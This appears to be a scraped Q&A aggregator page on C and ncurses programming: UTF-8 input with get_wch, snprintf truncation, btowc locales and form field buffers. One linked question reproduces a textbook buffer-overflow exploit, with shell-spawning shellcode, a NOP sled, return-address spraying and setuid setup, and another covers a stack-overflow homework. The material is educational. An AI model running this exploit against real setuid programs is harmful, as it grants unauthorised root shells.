reading ncurses stdin in UTF-8

reading ncurses stdin in UTF-8 - c

In my Linux program being developed in C with ncurses I need to read the stdin in UTF-8 encoding. However, whenever I do :
wint_t unicode_char=0;
get_wch(&unicode_char);
I get the wide character in utf-16 encoding (I can see it when I dump the variable with gdb). I do not want to convert it from utf-16 to utf-8, I want to force the input to be in UTF-8 all the time, no matter which Linux distribution runs my program with whatever foreign language the user has it configured. How is this done? Is it possible?
EDIT:
Here is the example source and proof that internally get_wch uses UTF-16 (which is the same as UTF-32) and not UTF-8, despite that I configured UTF-8 input source with setlocale().
[niko#dev1 ncurses]$ gcc -g -o getch -std=c99 $(ncursesw5-config --cflags --libs) getch.c
[niko#dev1 ncurses]$ cat getch.c
#define _GNU_SOURCE
#include <locale.h>
#include <ncursesw/ncurses.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int ct;
wint_t unichar;
int main(int argc, char *argv[])
{
setlocale(LC_ALL, ""); /* make sure UTF8 */
initscr();
raw();
keypad(stdscr, TRUE);
ct = get_wch(&unichar); /* read character */
mvprintw(24, 0, "Key pressed is = %4x ", unichar);
refresh();
getch();
endwin();
return 0;
}
Testing code with GDB:
🔎
Breakpoint 1, main (argc=1, argv=0x7fffffffded8) at getch.c:18
18 mvprintw(24, 0, "Key pressed is = %4x ", unichar);
Missing separate debuginfos, use: dnf debuginfo-install ncurses-libs-5.9-21.20150214.fc23.x86_64
(gdb) print unichar
$1 = 128270
(gdb) print/x ((unsigned short*) (&unichar))[0]
$2 = 0xf50e
(gdb) print/x ((unsigned short*) (&unichar))[1]
$3 = 0x1
(gdb) print/x ((unsigned char*) (&unichar))[0]
$4 = 0xe
(gdb) print/x ((unsigned char*) (&unichar))[1]
$5 = 0xf5
(gdb) print/x ((unsigned char*) (&unichar))[2]
$6 = 0x1
(gdb) print/x ((unsigned char*) (&unichar))[3]
$7 = 0x0
(gdb)
The input character is 🔎, and its UTF-8 should be 'f09f948e' as stated here: http://www.fileformat.info/info/unicode/char/1f50e/index.htm
How do I get UTF8 directly from get_wch() ?? Or maybe there is another function ?
P.S.
if you test the source code, link against '-lncursesw' , not '-lncurses' or compile with the same command as I did above

Short: you don't get UTF-8 from get_wch. That returns a wint_t (and a status code).
Long: you would get UTF-8 from ncurses getch because it converts to/from wchar_t internally:
Your program would have to read the encoded character one byte at a time, because getch only returns bytes (possibly combined with video attributes).
ncurses stores wchar_t values in the cells of each window structure.
addch and friends attempt to collect bytes for multibyte encodings (it's not specific to UTF-8, but not much used aside from this).
The attempt fails if you move the cursor in the middle of a string.
For what it's worth, dialog reads UTF-8 using getch. See inputstr.c to see how it works in practice.
X/Open curses as such does not do this (for the rare individual actually using Unix curses with UTF-8, there's no specified way).

Related

Why do I get a segmentation fault in the exploit_notesearch program from "Hacking: The Art of Exploitation"?

So, to start off with, I am on Kali 2020.1, fully updated. 64 bit.
The source code is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include "hacking.h"
#include <unistd.h>
#include <stdlib.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
long int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if(argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (long int) &i - offset; // Set return address.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
Now, some important clarifications. I included all those libraries because compilation throws warnings without them.
The preceding notetaker and notesearch programs, as well as this exploit_notesearch program have been compiled as follows in the Terminal:
gcc -g -mpreferred-stack-boundary=4 -no-pie -fno-stack-protector -Wl,-z,norelro -z execstack -o exploit_notesearch exploit_notesearch.c
I no longer remember the source which said I must compile this way (the preferred stack boundary was 2 for them, but my machine requires it to be between 4 and 12). Also, the stack is executable now as you can see.
All 3 programs (notetaker, notesearch, and exploit_notesearch) had their permissions modified as in the book:
sudo chown root:root ./program_name
sudo chmod u+s ./program_name
I tried following the solution from this link: Debugging Buffer Overflow Example , but to no avail. Same goes for this link: Not So Fast Shellcode Exploit
Changing the offset incrementally from 0 to 330 by using increments of 1, 10, 20, and 30 in the terminal using a for-loop also did not solve my problem. I keep getting a segmentation fault no matter what I do.
What could be the issue in my case and what would be the best way to overcome said issue? Thank you.
P.S I remember reading that I'm supposed to use 64-bit shellcode instead of the one provided.

When you are segfaulting, it is a great time to run it within a debugger like GDB. It should tell you right where you are crashing, and you can step through the execution and validate the assumptions you are making. The most common segfaults tend to be invalid memory permissions (like trying to execute a non-executable page) or an invalid instruction (eg., if you land in the middle of shellcode, not in a NOP sled).
You are running into a couple of issues trying to convert the exploit to work on 32-bit. When filling the buffer with return addresses, it's using the constant 4 when pointers on 64-bit are actually 8 bytes.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
That could also present some issues when trying to exploit the strcpy bug, because those 64-bit addresses will contain NULL bytes (since the usable address space only uses 6 of the 8 bytes). Thus, if you have some premature NULL bytes before actually overwriting the return address on the stack, you won't actually copy enough data to leverage the overflow as intended.

snprintf() overflows specified length

I was writing my own ncurses library and suddenly I found in GDB that snprintf() returned length larger than I specified. Is this defined behaviour or some mistake of mine ? The (reproducible) snippet code is this:
niko: snippets $ cat snprintf.c
#include <unistd.h>
#include <stdio.h>
char *example_string="This is a very long label. It was created to test alignment functions of VERTICAL and HORIZONTAL layout";
void snprintf_test(void) {
char tmp[72];
char fmt[32];
int len;
unsigned short x=20,y=30;
snprintf(fmt,sizeof(fmt),"\033[%%d;%%dH\033[0m\033[48;5;%%dm%%%ds",48);
len=snprintf(tmp,sizeof(tmp),fmt,y,x,0,example_string);
write(STDOUT_FILENO,tmp,len);
}
int main(void) {
snprintf_test();
}
niko: snippets $
Now we compile with debugging info and run:
niko: snippets $ gcc -g -o snprintf snprintf.c
niko: snippets $ gdb ./snprintf -ex "break snprintf_test" -ex run
.....
Reading symbols from ./snprintf...done.
Breakpoint 1 at 0x40058e: file snprintf.c, line 10.
Starting program: /home/deptrack/depserv/snippets/snprintf
Breakpoint 1, snprintf_test () at snprintf.c:10
10 unsigned short x=20,y=30;
Missing separate debuginfos, use: dnf debuginfo-install glibc-2.22-16.fc23.x86_64
(gdb) s
12 snprintf(fmt,sizeof(fmt),"\033[%%d;%%dH\033[0m\033[48;5;%%dm%%%ds",48);
(gdb) print sizeof(fmt)
$1 = 32
(gdb) print sizeof(tmp)
$2 = 72
(gdb) s
13 len=snprintf(tmp,sizeof(tmp),fmt,y,x,0,example_string);
(gdb) print fmt
$3 = "\033[%d;%dH\033[0m\033[48;5;%dm%48s\000\000\000\000\000"
(gdb) print example_string
$4 = 0x4006c0 "This is a very long label. It was created to test alignment functions of VERTICAL and HORIZONTAL layout"
(gdb) s
14 write(STDOUT_FILENO,tmp,len);
(gdb) print len
$5 = 124
(gdb) print sizeof(tmp)
$6 = 72
(gdb)
The program outputs garbage at the end of the string. As you can see, the len variable returned from snprintf() is indicating that function has printed more than the allowed size of 72. Is this a bug or my mistake? If this behaviour is defined, then why snprintf() docs say it will print at most n characters. Very misleading and bug prone statement. I will have to write my own snprintf() to solve this problem.

Actually (from "man snprintf"):
If the output was
truncated due to this limit then the return value is the number of
characters (excluding the terminating null byte) which would have been
written to the final string if enough space had been available.

Linux, field_buffer does not provide a UTF-8 string

In a C program for Linux, with ncursesw and form, I need to read the string stored in a field, with support for UTF-8 characters. When ASCII only is used, it is pretty simple, because the string is stored as an array of char:
char *dest;
...
dest = field_buffer(field[0], 0);
If I try to type a UTF-8 and non-ASCII character in the field with this code the character does not appear and it is not handled. In this answer for UTF-8 it is suggested to use ncursesw. But with the following code (written following this guide)
#define _XOPEN_SOURCE_EXTENDED
#include <ncursesw/form.h>
#include <locale.h>
int main()
{
...
setlocale(LC_ALL, "");
...
initscr();
wchar_t *dest;
...
dest = field_buffer(field[0], 0);
}
the compiler produces an error:
warning: assignment from incompatible pointer type [enabled by default]
dest = field_buffer(field[0], 0);
^
How to obtain from the field an array of wchar_t?
ncursesw uses get_wch instead of getch, so which function does it use instead of field_buffer()? I couldn't find it by googling.

The program is compiled in a system with the following locale:
$ locale
LANG=it_IT.UTF-8
LANGUAGE=
LC_CTYPE="it_IT.UTF-8"
LC_NUMERIC="it_IT.UTF-8"
LC_TIME="it_IT.UTF-8"
LC_COLLATE="it_IT.UTF-8"
LC_MONETARY="it_IT.UTF-8"
LC_MESSAGES="it_IT.UTF-8"
LC_PAPER="it_IT.UTF-8"
LC_NAME="it_IT.UTF-8"
LC_ADDRESS="it_IT.UTF-8"
LC_TELEPHONE="it_IT.UTF-8"
LC_MEASUREMENT="it_IT.UTF-8"
LC_IDENTIFICATION="it_IT.UTF-8"
LC_ALL=
It supports and uses UTF-8 as a default. With a locale like this, when the ncursesw environment is used, the C program should be able to save UTF-8 characters into a char array.
In order to correctly set up ncursesw it is very important to follow all the steps of the mentioned guide. In particular, the program should have the header
#define _XOPEN_SOURCE_EXTENDED
#include <ncursesw/form.h>
#include <stdio.h>
#include <locale.h>
The program should be compiled as
gcc -o executable_file source_file.c -lncursesw -lformw
and the program should contain
setlocale(LC_ALL, "");
before initscr();. With all these conditions satisfied, the string can be saved into a normal char array, as if ncurses and ASCII were used instead of ncursesw and UTF-8. As specified by John Bollinger in the comments, the function field_buffer can only return a char * and so it is unuseful to use any other data type such as wchar_t.

Does btowc(c) always return ( c in 0..127 ? c : WEOF )?

Is btowc(3) locale-dependant? I thought that with LANG=en_US.iso88591 it would return some european chars for bytes between 128 and 255, but it returns WEOF.
$ printf '\xFF\n' | iconv -f iso88591
ÿ
$ LANG=en_US.iso88591 ./a.out
255 -1
_
int main() {
int i = 0xFF;
printf("%d %d\n", i, btowc(i));
}

On my system anyway, going:
#include <locale.h>
//...
setlocale(LC_CTYPE, "en_US.iso88591");
causes the output to be 255 255. So this indicates that it does seem to be locale-dependent, although the C standard doesn't explicitly say that it is, as far as I can see. (It says that the mbs* function family are locale-dependent , but doesn't say so for btowc).
Your post looks like you are expecting the LANG environment variable to change how setlocale is done in the program startup. That variable affects how gcc reads your source files, but perhaps it does not have any run-time effect. The C standard says that programs all start up in the locale C.

Code to print the stack in C only returning "1"

I'm learning about security. Here is some sample code I've been given:
#include <stdio.h>
#include <string.h>
char *j; /* use to dump the stack in function cat */
/* Strings to be copied into buffer in function cat */
char str1[] = "";
char str2[] = "";
int main() {
void cat(int *parm) {
char buffer[8];
/* Dump the stack for function cat */
for (j=buffer; j<((char *)&parm); j++)
printf("%p: 0x%x\n", j, *(unsigned char *)j);
/* copy str1 followed by str2 into buffer */
/* note that a \0 remains between str1 and str2 in buffer */
strcpy(buffer, str1);
strcpy(&buffer[strlen(str1)+1], str2);
}
int *arg; /* dummy argument for call to function cat */
int x;
x = 0;
cat(arg);
x = 1;
printf("%d\n",x);
}
I'm compiling with GCC. All I'm getting is "1" though. Any ideas why?
Also, my goal is to eventually get the program to print out "0", and achieve this by only adding code to cat(). I can't change anything already there, just add. Any help to get me started in the right direction.

I'm compiling with GCC. All I'm getting is "1" though. Any ideas why?
We can see
x = 1;
printf("%d\n",x);
so that is likely the only print statement actually being run.
So I infer that for (j=buffer; j<((char *)&parm); j++) is never entered.
Which is a bit weird. I'd expect a downward growing stack, so I'd expect the address of the parameter parm to be higher than buffer.
What machine are you using?
Try printing the values of buffer and &parm, e.g.
void cat(int *parm) {
char buffer[8];
printf("buffer=%p\n", buffer);
printf("&parm=%p\n", &parm);
...

Your trampoline code compiles fine for me:
gcc -o tramp tramp
on Linux 2.6.24,
$ gcc --version
gcc (GCC) 4.3.4 20090804 (release) 1
My output:
jim#jim-HP ~
$ cc tramp.c -o tramp
jim#jim-HP ~
$ tramp
0x28ccf0: 0x4
0x28ccf1: 0x6f
0x28ccf2: 0x24
0x28ccf3: 0x61
0x28ccf4: 0x6
0x28ccf5: 0x6f
0x28ccf6: 0x24
0x28ccf7: 0x61
0x28ccf8: 0x28
0x28ccf9: 0xcd
0x28ccfa: 0x28
0x28ccfb: 0x0
0x28ccfc: 0xa8
0x28ccfd: 0x11
0x28ccfe: 0x40
0x28ccff: 0x0
1
Is that what you meant by 'all I got was 1'?

I get the same results with gcc 4.6.2 on 64-bit Linux, whether I use native 64-bit compilation or make a 32-bit executable with -m32. Looking at the assembly code produced by gcc -S, the issue is that gcc is making a local copy of parm in the stack frame of cat, with an address lower than buffer.
Now in the case of 64-bit code gcc has no choice on that point, since the argument is passed in a CPU register, and there would be no other way to give parm an address for the &parm operation. However, for some reason gcc makes a local copy of parm even in 32-bit code, where it would have a perfectly fine copy already in the stack.
In any case I think all this is a side issue for your homework: you can get a better upper bound for the loop by passing something useful in parm and then use parm instead of &parm at the loop bound in cat.

Develop Reference

c reactjs sql-server angularjs arrays wpf database batch-file google-app-engine silverlight

reading ncurses stdin in UTF-8 - c

Related

Why do I get a segmentation fault in the exploit_notesearch program from "Hacking: The Art of Exploitation"?

snprintf() overflows specified length

Linux, field_buffer does not provide a UTF-8 string

Does btowc(c) always return ( c in 0..127 ? c : WEOF )?

Code to print the stack in C only returning "1"

Categories

Resources